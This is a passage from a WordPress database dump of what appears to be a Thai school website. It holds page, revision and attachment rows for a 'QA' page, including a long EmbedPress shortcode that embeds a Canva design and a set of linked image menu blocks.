_background_color_b_stop=\'false\' _background_gradient_type=\'false\' _background_gradient_angle=\'false\' _background_gradient_position=\'false\' _background_image=\'false\' _background_position=\'false\' _background_xpos=\'false\' _background_ypos=\'false\' _background_attachment=\'false\' _background_repeat=\'false\' _background_size=\'false\' _background_bg_width=\'false\' _background_video_link=\'false\' _background_video_start=\'false\' _background_video_end=\'false\' _background_play_once=\'false\' _background_play_on_mobile=\'false\' _background_privacy_mode=\'false\' _background_video_fallback=\'false\' _background_slideshow_gallery=\'false\' _background_slideshow_loop=\'false\' _background_slideshow_slide_duration=\'false\' _background_slideshow_slide_transition=\'false\' _background_slideshow_transition_duration=\'false\' _background_slideshow_background_size=\'false\' _background_slideshow_background_position=\'false\' _background_slideshow_lazyload=\'false\' _background_slideshow_ken_burns=\'false\' _background_slideshow_ken_burns_zoom_direction=\'false\' _background_hover_background=\'false\' _background_hover_color=\'false\' _background_hover_color_stop=\'false\' _background_hover_color_b=\'false\' _background_hover_color_b_stop=\'false\' _background_hover_gradient_type=\'false\' _background_hover_gradient_angle=\'false\' _background_hover_gradient_position=\'false\' _background_hover_image=\'false\' _background_hover_position=\'false\' _background_hover_xpos=\'false\' _background_hover_ypos=\'false\' _background_hover_attachment=\'false\' _background_hover_repeat=\'false\' _background_hover_size=\'false\' _background_hover_bg_width=\'false\' _background_hover_video_link=\'false\' _background_hover_video_start=\'false\' _background_hover_video_end=\'false\' _background_hover_play_once=\'false\' _background_hover_play_on_mobile=\'false\' _background_hover_privacy_mode=\'false\' _background_hover_video_fallback=\'false\' _background_hover_slideshow_gallery=\'false\' _background_hover_slideshow_loop=\'false\' _background_hover_slideshow_slide_duration=\'false\' _background_hover_slideshow_slide_transition=\'false\' _background_hover_slideshow_transition_duration=\'false\' _background_hover_slideshow_background_size=\'false\' _background_hover_slideshow_background_position=\'false\' _background_hover_slideshow_lazyload=\'false\' _background_hover_slideshow_ken_burns=\'false\' _background_hover_slideshow_ken_burns_zoom_direction=\'false\' _border_border=\'false\' _border_width=\'false\' _border_color=\'false\' _box_shadow_box_shadow_type=\'false\' _box_shadow_box_shadow=\'false\' _box_shadow_box_shadow_position=\'false\' _border_hover_border=\'false\' _border_hover_width=\'false\' _border_hover_color=\'false\' _box_shadow_hover_box_shadow_type=\'false\' _box_shadow_hover_box_shadow=\'false\' _box_shadow_hover_box_shadow_position=\'false\' _mask_switch=\'false\' _mask_shape=\'false\' _mask_image=\'false\' _mask_notice=\'false\' _mask_size=\'false\' _mask_size_scale=\'false\' _mask_position=\'false\' _mask_position_x=\'false\' _mask_position_y=\'false\' _mask_repeat=\'false\' hide_desktop=\'false\' hide_tablet=\'false\' hide_mobile=\'false\']https://www.canva.com/design/DAGsFHWqrOk/eCZISZCLZjZV8cpVDnNIUA/view[/embedpress]','QA','','publish','closed','closed','','qa','','','2025-07-03 11:41:16','2025-07-03 04:41:16','',0,'http://pakhaeng.ssk.in.th/?page_id=1637',0,'page','',0),
(1638,1,'2025-07-03 11:38:22','2025-07-03 04:38:22','','ๆฟ','','inherit','','closed','','%e0%b9%86%e0%b8%9f','','','2025-07-03 11:38:22','2025-07-03 04:38:22','',1637,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ๆฟ.png',0,'attachment','image/png',0),
(1639,1,'2025-07-03 11:39:08','2025-07-03 04:39:08','<!-- wp:image {\"id\":1638,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ๆฟ-1024x256.png\" alt=\"\" class=\"wp-image-1638\"/></figure>\n<!-- /wp:image -->','QA','','inherit','closed','closed','','1637-revision-v1','','','2025-07-03 11:39:08','2025-07-03 04:39:08','',1637,'http://pakhaeng.ssk.in.th/?p=1639',0,'revision','',0),
(1640,1,'2025-07-03 11:41:16','2025-07-03 04:41:16','<!-- wp:image {\"id\":1638,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ๆฟ-1024x256.png\" alt=\"\" class=\"wp-image-1638\"/></figure>\n<!-- /wp:image -->','QA','','inherit','closed','closed','','1637-revision-v1','','','2025-07-03 11:41:16','2025-07-03 04:41:16','',1637,'http://pakhaeng.ssk.in.th/?p=1640',0,'revision','',0),
(1641,1,'2025-07-03 11:41:16','2025-07-03 04:41:16','<!-- wp:image {\"id\":1638,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ๆฟ-1024x256.png\" alt=\"\" class=\"wp-image-1638\"/></figure>\n<!-- /wp:image -->','QA','','inherit','closed','closed','','1637-revision-v1','','','2025-07-03 11:41:16','2025-07-03 04:41:16','',1637,'http://pakhaeng.ssk.in.th/?p=1641',0,'revision','',0),
(1642,1,'2025-07-03 11:41:16','2025-07-03 04:41:16','<!-- wp:image {\"id\":1638,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ๆฟ-1024x256.png\" alt=\"\"/></figure>\n<!-- /wp:image -->[embedpress embedpress_embeded_link=\'https://www.canva.com/design/DAGsFHWqrOk/eCZISZCLZjZV8cpVDnNIUA/view\' prefix_nftcreator=\'false\' prefix_nftprice=\'false\' prefix_nftlastsale=\'false\' label_nftbutton=\'false\' loadmorelabel=\'false\' label_nftrank=\'false\' label_nftdetails=\'false\' instafeedFollowBtnLabel=\'false\' instafeedPostsCountText=\'false\' instafeedFollowersCountText=\'false\' instafeedPopupFollowBtnLabel=\'false\' instafeedLoadmoreLabel=\'false\' cPopupButtonText=\'false\' adWidth=\'false\' adHeight=\'false\' adStart=\'false\' adSkipButtonAfter=\'false\' embedpress_protection_message=\'false\' embedpress_lock_content_error_message=\'false\' embedpress_password_placeholder=\'false\' embedpress_submit_button_text=\'false\' embedpress_submit_Unlocking_text=\'false\' embedpress_lock_content_heading=\'false\' embedpress_lock_content_sub_heading=\'false\' embedpress_lock_content_footer_message=\'false\' width=\'1500\' height=\'519\' embedpress_pro_embeded_source=\'default\' instafeedFeedType=\'false\' instafeedAccountType=\'false\' embedpress_pro_embeded_nft_type=\'false\' embedpress_audio_video_auto_pause=\'false\' spotify_theme=\'false\' emberpress_custom_player=\'false\' custom_payer_preset=\'false\' embedpress_pro_video_start_time=\'false\' embedpress_pro_youtube_end_time=\'false\' embedpress_player_color=\'false\' embedpress_pro_vimeo_auto_play=\'false\' embedpress_pro_vimeo_autopause=\'false\' embedpress_pro_vimeo_dnt=\'false\' embedpress_pro_youtube_auto_play=\'false\' embedpress_pro_youtube_mute=\'false\' embedpress_pro_youtube_display_controls=\'false\' embedpress_pro_youtube_enable_fullscreen_button=\'false\' embedpress_pro_youtube_display_video_annotations=\'false\' embedpress_pro_youtube_progress_bar_color=\'false\' embedpress_pro_youtube_force_closed_captions=\'false\' embedpress_pro_youtube_modest_branding=\'false\' embepress_player_restart=\'false\' embepress_player_rewind=\'false\' embepress_player_fast_forward=\'false\' embepress_player_tooltip=\'false\' embepress_player_hide_controls=\'false\' embepress_player_download=\'false\' embepress_player_always_on_top=\'false\' embedpress_pro_youtube_display_related_videos=\'false\' embedpress_player_poster_thumbnail=\'false\' embedpress_pro_youtube_logo=\'false\' embedpress_pro_youtube_logo_size=\'false\' embedpress_pro_youtube_logo_custom_dimension=\'false\' embedpress_pro_youtube_logo_xpos=\'false\' embedpress_pro_youtube_logo_ypos=\'false\' embedpress_pro_youtube_logo_opacity=\'false\' embedpress_pro_youtube_logo_opacity_hover=\'false\' embedpress_pro_youtube_cta=\'false\' embedpress_pro_vimeo_color=\'false\' embedpress_pro_vimeo_display_title=\'false\' embedpress_pro_vimeo_display_author=\'false\' embedpress_pro_vimeo_avatar=\'false\' embedpress_pro_vimeo_loop=\'false\' embedpress_pro_vimeo_logo=\'false\' embedpress_pro_vimeo_logo_size=\'false\' embedpress_pro_vimeo_logo_custom_dimension=\'false\' embedpress_pro_vimeo_logo_xpos=\'false\' embedpress_pro_vimeo_logo_ypos=\'false\' embedpress_pro_vimeo_logo_opacity=\'false\' embedpress_pro_vimeo_logo_opacity_hover=\'false\' embedpress_pro_vimeo_cta=\'false\' embedpress_pro_wistia_auto_play=\'false\' embedpress_pro_wistia_color=\'false\' embedpress_pro_wistia_fullscreen_button=\'false\' embedpress_pro_wistia_small_play_button=\'false\' embedpress_pro_wistia_captions=\'false\' embedpress_pro_wistia_captions_enabled_by_default=\'false\' embedpress_pro_wistia_playbar=\'false\' embedpress_pro_wistia_volume_control=\'false\' embedpress_pro_wistia_volume=\'false\' embedpress_pro_wistia_logo=\'false\' embedpress_pro_wistia_logo_size=\'false\' embedpress_pro_wistia_logo_custom_dimension=\'false\' embedpress_pro_wistia_logo_xpos=\'false\' embedpress_pro_wistia_logo_ypos=\'false\' embedpress_pro_wistia_logo_opacity=\'false\' embedpress_pro_wistia_logo_opacity_hover=\'false\' embedpress_pro_wistia_cta=\'false\' embedpress_pro_soundcloud_visual=\'false\' embedpress_pro_soundcloud_color=\'false\' embedpress_pro_soundcloud_autoplay=\'false\' embedpress_pro_soundcloud_share_button=\'false\' embedpress_pro_soundcloud_comments=\'false\' embedpress_pro_soundcloud_artwork=\'false\' embedpress_pro_soundcloud_play_count=\'false\' embedpress_pro_soundcloud_user_name=\'false\' embedpress_pro_soundcloud_buy_button=\'false\' embedpress_pro_soundcloud_download_button=\'false\' embedpress_pro_dailymotion_ui_logo=\'false\' embedpress_pro_dailymotion_autoplay=\'false\' embedpress_pro_dailymotion_play_on_mobile=\'false\' embedpress_pro_dailymotion_mute=\'false\' embedpress_pro_dailymotion_player_control=\'false\' embedpress_pro_dailymotion_video_info=\'false\' embedpress_pro_dailymotion_control_color=\'false\' embedpress_pro_dailymotion_logo=\'false\' embedpress_pro_dailymotion_logo_size=\'false\' embedpress_pro_dailymotion_logo_custom_dimension=\'false\' embedpress_pro_dailymotion_logo_xpos=\'false\' embedpress_pro_dailymotion_logo_ypos=\'false\' embedpress_pro_dailymotion_logo_opacity=\'false\' embedpress_pro_dailymotion_logo_opacity_hover=\'false\' embedpress_pro_dailymotion_cta=\'false\' embedpress_pro_twitch_autoplay=\'false\' embedpress_pro_fs=\'false\' embedpress_pro_twitch_chat=\'false\' embedpress_pro_twitch_mute=\'false\' embedpress_pro_twitch_theme=\'false\' embedpress_pro_twitch_logo=\'false\' embedpress_pro_twitch_logo_size=\'false\' embedpress_pro_twitch_logo_custom_dimension=\'false\' embedpress_pro_twitch_logo_xpos=\'false\' embedpress_pro_twitch_logo_ypos=\'false\' embedpress_pro_twitch_logo_opacity=\'false\' embedpress_pro_twitch_logo_opacity_hover=\'false\' embedpress_pro_twitch_cta=\'false\' limit=\'false\' orderby=\'false\' ytChannelLayout=\'false\' pagesize=\'false\' columns=\'false\' gapbetweenvideos=\'false\' pagination=\'false\' yt_sub_channel=\'false\' yt_sub_text=\'false\' yt_sub_layout=\'false\' yt_sub_theme=\'false\' yt_sub_count=\'false\' yt_lc_show=\'false\' layout=\'false\' preset=\'false\' nftperrow=\'false\' gapbetweenitem=\'false\' collectionname=\'false\' nftimage=\'false\' nfttitle=\'false\' nftcreator=\'false\' nftprice=\'false\' nftlastsale=\'false\' nftbutton=\'false\' loadmore=\'false\' itemperpage=\'false\' nftrank=\'false\' nftdetails=\'false\' instafeedProfileImage=\'false\' instafeedProfileImageUrl=\'false\' instafeedFollowBtn=\'false\' instafeedPostsCount=\'false\' instafeedFollowersCount=\'false\' instafeedAccName=\'false\' instaLayout=\'false\' instafeedColumns=\'false\' instafeedColumnsGap=\'false\' embedpress_instafeed_slide_show=\'false\' embedpress_carousel_autoplay=\'false\' embedpress_carousel_autoplay_speed=\'false\' embedpress_carousel_transition_speed=\'false\' embedpress_carousel_loop=\'false\' embedpress_carousel_arrows=\'false\' embedpress_carousel_spacing=\'false\' instafeedPostsPerPage=\'false\' instafeedTab=\'false\' instafeedLikesCount=\'false\' instafeedCommentsCount=\'false\' instafeedPopup=\'false\' instafeedPopupFollowBtn=\'false\' instafeedLoadmore=\'false\' cEmbedType=\'false\' cPopupButtonTextColor=\'false\' cPopupButtonBGColor=\'false\' calendlyData=\'false\' hideCookieBanner=\'false\' hideEventTypeDetails=\'false\' cBackgroundColor=\'false\' cTextColor=\'false\' cButtonLinkColor=\'false\' theme=\'false\' color=\'false\' coverImageUrl=\'false\' hideDownload=\'false\' playlist=\'false\' playlistContinuous=\'false\' playlistLoop=\'false\' playlistAutoupdate=\'false\' hidePlaylistDescriptions=\'false\' hidePlaylistImages=\'false\' episodeImagePosition=\'false\' showChaptersImage=\'false\' hideLikes=\'false\' hideComments=\'false\' hideSharing=\'false\' hideLogo=\'false\' hideEpisodeDescription=\'false\' mode=\'false\' playerAutoplay=\'false\' delay=\'false\' repeat=\'false\' backgroundColor=\'false\' expiration=\'false\' adManager=\'false\' adSource=\'false\' adFileUrl=\'false\' adFileUrl1=\'false\' adXPosition=\'false\' adYPosition=\'false\' adUrl=\'false\' adSkipButton=\'false\' embedpress_lock_content=\'false\' embedpress_protection_type=\'false\' embedpress_select_roles=\'false\' embedpress_lock_content_password=\'false\' embedpress_enable_footer_message=\'false\' embedpress_content_share=\'false\' embedpress_content_share_position=\'false\' embedpress_content_title=\'false\' embedpress_content_descripiton=\'false\' embedpress_content_share_custom_thumbnail=\'false\' embedpress_share_facebook=\'false\' embedpress_share_twitter=\'false\' embedpress_share_pinterest=\'false\' embedpress_share_linkedin=\'false\' align=\'false\' align_tablet=\'false\' align_mobile=\'false\' nft_item_background_color=\'false\' nft_collectionname_color=\'false\' nft_collectionname_hover_color=\'false\' nft_collectionname_typography_typography=\'false\' nft_collectionname_typography_font_family=\'false\' nft_collectionname_typography_font_size=\'false\' nft_collectionname_typography_font_weight=\'false\' nft_collectionname_typography_text_transform=\'false\' nft_collectionname_typography_font_style=\'false\' nft_collectionname_typography_text_decoration=\'false\' nft_collectionname_typography_line_height=\'false\' nft_collectionname_typography_letter_spacing=\'false\' nft_collectionname_typography_word_spacing=\'false\' nft_title_color=\'false\' nft_title_typography_typography=\'false\' nft_title_typography_font_family=\'false\' nft_title_typography_font_size=\'false\' nft_title_typography_font_weight=\'false\' nft_title_typography_text_transform=\'false\' nft_title_typography_font_style=\'false\' nft_title_typography_text_decoration=\'false\' nft_title_typography_line_height=\'false\' nft_title_typography_letter_spacing=\'false\' nft_title_typography_word_spacing=\'false\' nft_creator_color=\'false\' nft_creator_typography_typography=\'false\' nft_creator_typography_font_family=\'false\' nft_creator_typography_font_size=\'false\' nft_creator_typography_font_weight=\'false\' nft_creator_typography_text_transform=\'false\' nft_creator_typography_font_style=\'false\' nft_creator_typography_text_decoration=\'false\' nft_creator_typography_line_height=\'false\' nft_creator_typography_letter_spacing=\'false\' nft_creator_typography_word_spacing=\'false\' nft_created_by_color=\'false\' nft_created_by_typography_typography=\'false\' nft_created_by_typography_font_family=\'false\' nft_created_by_typography_font_size=\'false\' nft_created_by_typography_font_weight=\'false\' nft_created_by_typography_text_transform=\'false\' nft_created_by_typography_font_style=\'false\' nft_created_by_typography_text_decoration=\'false\' nft_created_by_typography_line_height=\'false\' nft_created_by_typography_letter_spacing=\'false\' nft_created_by_typography_word_spacing=\'false\' nft_price_color=\'false\' nft_price_typography_typography=\'false\' nft_price_typography_font_family=\'false\' nft_price_typography_font_size=\'false\' nft_price_typography_font_weight=\'false\' nft_price_typography_text_transform=\'false\' nft_price_typography_font_style=\'false\' nft_price_typography_text_decoration=\'false\' nft_price_typography_line_height=\'false\' nft_price_typography_letter_spacing=\'false\' nft_price_typography_word_spacing=\'false\' nft_last_sale_color=\'false\' nft_last_sale_typography_typography=\'false\' nft_last_sale_typography_font_family=\'false\' nft_last_sale_typography_font_size=\'false\' nft_last_sale_typography_font_weight=\'false\' nft_last_sale_typography_text_transform=\'false\' nft_last_sale_typography_font_style=\'false\' nft_last_sale_typography_text_decoration=\'false\' nft_last_sale_typography_line_height=\'false\' nft_last_sale_typography_letter_spacing=\'false\' nft_last_sale_typography_word_spacing=\'false\' nftbutton_color=\'false\' nftbutton_bg_color=\'false\' nftbutton_typography_typography=\'false\' nftbutton_typography_font_family=\'false\' nftbutton_typography_font_size=\'false\' nftbutton_typography_font_weight=\'false\' nftbutton_typography_text_transform=\'false\' nftbutton_typography_font_style=\'false\' nftbutton_typography_text_decoration=\'false\' nftbutton_typography_line_height=\'false\' nftbutton_typography_letter_spacing=\'false\' nftbutton_typography_word_spacing=\'false\' nft_loadmore_color=\'false\' nft_loadmore_typography_typography=\'false\' nft_loadmore_typography_font_family=\'false\' nft_loadmore_typography_font_size=\'false\' nft_loadmore_typography_font_weight=\'false\' nft_loadmore_typography_text_transform=\'false\' nft_loadmore_typography_font_style=\'false\' nft_loadmore_typography_text_decoration=\'false\' nft_loadmore_typography_line_height=\'false\' nft_loadmore_typography_letter_spacing=\'false\' nft_loadmore_typography_word_spacing=\'false\' nft_loadmore_bgcolor=\'false\' nftrank_label_color=\'false\' nftrank_label_typography_typography=\'false\' nftrank_label_typography_font_family=\'false\' nftrank_label_typography_font_size=\'false\' nftrank_label_typography_font_weight=\'false\' nftrank_label_typography_text_transform=\'false\' nftrank_label_typography_font_style=\'false\' nftrank_label_typography_text_decoration=\'false\' nftrank_label_typography_line_height=\'false\' nftrank_label_typography_letter_spacing=\'false\' nftrank_label_typography_word_spacing=\'false\' nftrank_color=\'false\' nftrank_border_color=\'false\' nftrank_typography_typography=\'false\' nftrank_typography_font_family=\'false\' nftrank_typography_font_size=\'false\' nftrank_typography_font_weight=\'false\' nftrank_typography_text_transform=\'false\' nftrank_typography_font_style=\'false\' nftrank_typography_text_decoration=\'false\' nftrank_typography_line_height=\'false\' nftrank_typography_letter_spacing=\'false\' nftrank_typography_word_spacing=\'false\' nftdetail_title_color=\'false\' nftdetail_title_typography_typography=\'false\' nftdetail_title_typography_font_family=\'false\' nftdetail_title_typography_font_size=\'false\' nftdetail_title_typography_font_weight=\'false\' nftdetail_title_typography_text_transform=\'false\' nftdetail_title_typography_font_style=\'false\' nftdetail_title_typography_text_decoration=\'false\' nftdetail_title_typography_line_height=\'false\' nftdetail_title_typography_letter_spacing=\'false\' nftdetail_title_typography_word_spacing=\'false\' nftdetail_color=\'false\' nftdetail_typography_typography=\'false\' nftdetail_typography_font_family=\'false\' nftdetail_typography_font_size=\'false\' nftdetail_typography_font_weight=\'false\' nftdetail_typography_text_transform=\'false\' nftdetail_typography_font_style=\'false\' nftdetail_typography_text_decoration=\'false\' nftdetail_typography_line_height=\'false\' nftdetail_typography_letter_spacing=\'false\' nftdetail_typography_word_spacing=\'false\' nftdetail_link_color=\'false\' nftdetail_link_typography_typography=\'false\' nftdetail_link_typography_font_family=\'false\' nftdetail_link_typography_font_size=\'false\' nftdetail_link_typography_font_weight=\'false\' nftdetail_link_typography_text_transform=\'false\' nftdetail_link_typography_font_style=\'false\' nftdetail_link_typography_text_decoration=\'false\' nftdetail_link_typography_line_height=\'false\' nftdetail_link_typography_letter_spacing=\'false\' nftdetail_link_typography_word_spacing=\'false\' _title=\'false\' _element_width=\'false\' _element_width_tablet=\'false\' _element_width_mobile=\'false\' _element_custom_width=\'false\' _grid_column=\'false\' _grid_column_custom=\'false\' _grid_row=\'false\' _grid_row_custom=\'false\' _flex_align_self=\'false\' _flex_order=\'false\' _flex_order_custom=\'false\' _flex_size=\'false\' _flex_grow=\'false\' _flex_shrink=\'false\' _element_vertical_align=\'false\' _position=\'false\' _offset_orientation_h=\'false\' _offset_x=\'false\' _offset_x_end=\'false\' _offset_orientation_v=\'false\' _offset_y=\'false\' _offset_y_end=\'false\' _z_index=\'false\' _element_id=\'false\' _css_classes=\'false\' _element_cache=\'false\' _animation=\'false\' _animation_tablet=\'false\' _animation_mobile=\'false\' animation_duration=\'false\' _animation_delay=\'false\' _transform_rotate_popover=\'false\' _transform_rotateZ_effect=\'false\' _transform_rotateZ_effect_tablet=\'false\' _transform_rotateZ_effect_mobile=\'false\' _transform_rotate_3d=\'false\' _transform_rotateX_effect=\'false\' _transform_rotateX_effect_tablet=\'false\' _transform_rotateX_effect_mobile=\'false\' _transform_rotateY_effect=\'false\' _transform_rotateY_effect_tablet=\'false\' _transform_rotateY_effect_mobile=\'false\' _transform_perspective_effect=\'false\' _transform_perspective_effect_tablet=\'false\' _transform_perspective_effect_mobile=\'false\' _transform_translate_popover=\'false\' _transform_translateX_effect=\'false\' _transform_translateX_effect_tablet=\'false\' _transform_translateX_effect_mobile=\'false\' _transform_translateY_effect=\'false\' _transform_translateY_effect_tablet=\'false\' _transform_translateY_effect_mobile=\'false\' _transform_scale_popover=\'false\' _transform_keep_proportions=\'yes\' _transform_scale_effect=\'false\' _transform_scale_effect_tablet=\'false\' _transform_scale_effect_mobile=\'false\' _transform_scaleX_effect=\'false\' _transform_scaleX_effect_tablet=\'false\' _transform_scaleX_effect_mobile=\'false\' _transform_scaleY_effect=\'false\' _transform_scaleY_effect_tablet=\'false\' _transform_scaleY_effect_mobile=\'false\' _transform_skew_popover=\'false\' _transform_skewX_effect=\'false\' _transform_skewX_effect_tablet=\'false\' _transform_skewX_effect_mobile=\'false\' _transform_skewY_effect=\'false\' _transform_skewY_effect_tablet=\'false\' _transform_skewY_effect_mobile=\'false\' _transform_flipX_effect=\'false\' _transform_flipY_effect=\'false\' _transform_rotate_popover_hover=\'false\' _transform_rotateZ_effect_hover=\'false\' _transform_rotateZ_effect_hover_tablet=\'false\' _transform_rotateZ_effect_hover_mobile=\'false\' _transform_rotate_3d_hover=\'false\' _transform_rotateX_effect_hover=\'false\' _transform_rotateX_effect_hover_tablet=\'false\' _transform_rotateX_effect_hover_mobile=\'false\' _transform_rotateY_effect_hover=\'false\' _transform_rotateY_effect_hover_tablet=\'false\' _transform_rotateY_effect_hover_mobile=\'false\' _transform_perspective_effect_hover=\'false\' _transform_perspective_effect_hover_tablet=\'false\' _transform_perspective_effect_hover_mobile=\'false\' _transform_translate_popover_hover=\'false\' _transform_translateX_effect_hover=\'false\' _transform_translateX_effect_hover_tablet=\'false\' _transform_translateX_effect_hover_mobile=\'false\' _transform_translateY_effect_hover=\'false\' _transform_translateY_effect_hover_tablet=\'false\' _transform_translateY_effect_hover_mobile=\'false\' _transform_scale_popover_hover=\'false\' _transform_keep_proportions_hover=\'yes\' _transform_scale_effect_hover=\'false\' _transform_scale_effect_hover_tablet=\'false\' _transform_scale_effect_hover_mobile=\'false\' _transform_scaleX_effect_hover=\'false\' _transform_scaleX_effect_hover_tablet=\'false\' _transform_scaleX_effect_hover_mobile=\'false\' _transform_scaleY_effect_hover=\'false\' _transform_scaleY_effect_hover_tablet=\'false\' _transform_scaleY_effect_hover_mobile=\'false\' _transform_skew_popover_hover=\'false\' _transform_skewX_effect_hover=\'false\' _transform_skewX_effect_hover_tablet=\'false\' _transform_skewX_effect_hover_mobile=\'false\' _transform_skewY_effect_hover=\'false\' _transform_skewY_effect_hover_tablet=\'false\' _transform_skewY_effect_hover_mobile=\'false\' _transform_flipX_effect_hover=\'false\' _transform_flipY_effect_hover=\'false\' motion_fx_transform_x_anchor_point=\'false\' motion_fx_transform_y_anchor_point=\'false\' _background_background=\'false\' _background_color=\'false\' _background_color_stop=\'false\' _background_color_b=\'false\' _background_color_b_stop=\'false\' _background_gradient_type=\'false\' _background_gradient_angle=\'false\' _background_gradient_position=\'false\' _background_image=\'false\' _background_position=\'false\' _background_xpos=\'false\' _background_ypos=\'false\' _background_attachment=\'false\' _background_repeat=\'false\' _background_size=\'false\' _background_bg_width=\'false\' _background_video_link=\'false\' _background_video_start=\'false\' _background_video_end=\'false\' _background_play_once=\'false\' _background_play_on_mobile=\'false\' _background_privacy_mode=\'false\' _background_video_fallback=\'false\' _background_slideshow_gallery=\'false\' _background_slideshow_loop=\'false\' _background_slideshow_slide_duration=\'false\' _background_slideshow_slide_transition=\'false\' _background_slideshow_transition_duration=\'false\' _background_slideshow_background_size=\'false\' _background_slideshow_background_position=\'false\' _background_slideshow_lazyload=\'false\' _background_slideshow_ken_burns=\'false\' _background_slideshow_ken_burns_zoom_direction=\'false\' _background_hover_background=\'false\' _background_hover_color=\'false\' _background_hover_color_stop=\'false\' _background_hover_color_b=\'false\' _background_hover_color_b_stop=\'false\' _background_hover_gradient_type=\'false\' _background_hover_gradient_angle=\'false\' _background_hover_gradient_position=\'false\' _background_hover_image=\'false\' _background_hover_position=\'false\' _background_hover_xpos=\'false\' _background_hover_ypos=\'false\' _background_hover_attachment=\'false\' _background_hover_repeat=\'false\' _background_hover_size=\'false\' _background_hover_bg_width=\'false\' _background_hover_video_link=\'false\' _background_hover_video_start=\'false\' _background_hover_video_end=\'false\' _background_hover_play_once=\'false\' _background_hover_play_on_mobile=\'false\' _background_hover_privacy_mode=\'false\' _background_hover_video_fallback=\'false\' _background_hover_slideshow_gallery=\'false\' _background_hover_slideshow_loop=\'false\' _background_hover_slideshow_slide_duration=\'false\' _background_hover_slideshow_slide_transition=\'false\' _background_hover_slideshow_transition_duration=\'false\' _background_hover_slideshow_background_size=\'false\' _background_hover_slideshow_background_position=\'false\' _background_hover_slideshow_lazyload=\'false\' _background_hover_slideshow_ken_burns=\'false\' _background_hover_slideshow_ken_burns_zoom_direction=\'false\' _border_border=\'false\' _border_width=\'false\' _border_color=\'false\' _box_shadow_box_shadow_type=\'false\' _box_shadow_box_shadow=\'false\' _box_shadow_box_shadow_position=\'false\' _border_hover_border=\'false\' _border_hover_width=\'false\' _border_hover_color=\'false\' _box_shadow_hover_box_shadow_type=\'false\' _box_shadow_hover_box_shadow=\'false\' _box_shadow_hover_box_shadow_position=\'false\' _mask_switch=\'false\' _mask_shape=\'false\' _mask_image=\'false\' _mask_notice=\'false\' _mask_size=\'false\' _mask_size_scale=\'false\' _mask_position=\'false\' _mask_position_x=\'false\' _mask_position_y=\'false\' _mask_repeat=\'false\' hide_desktop=\'false\' hide_tablet=\'false\' hide_mobile=\'false\']https://www.canva.com/design/DAGsFHWqrOk/eCZISZCLZjZV8cpVDnNIUA/view[/embedpress]','QA','','inherit','closed','closed','','1637-revision-v1','','','2025-07-03 11:41:16','2025-07-03 04:41:16','',1637,'http://pakhaeng.ssk.in.th/?p=1642',0,'revision','',0),
(1643,1,'2025-07-03 11:41:58','2025-07-03 04:41:58','','AQ','','inherit','','closed','','aq','','','2025-07-03 11:41:58','2025-07-03 04:41:58','',459,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/AQ.png',0,'attachment','image/png',0),
(1645,1,'2025-07-03 11:42:32','2025-07-03 04:42:32','<!-- wp:image {\"id\":1620,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/Is-It-a-Gift-Instagram-Post-1024x256.png\" alt=\"\" class=\"wp-image-1620\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":736,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\",\"className\":\"is-style-default\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized is-style-default\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย-1.png\" alt=\"\" class=\"wp-image-736\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\",\"className\":\"is-style-default\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized is-style-default\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1643,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\",\"className\":\"is-style-default\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized is-style-default\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1637\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/AQ.png\" alt=\"\" class=\"wp-image-1643\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":738,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด-1.png\" alt=\"\" class=\"wp-image-738\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- 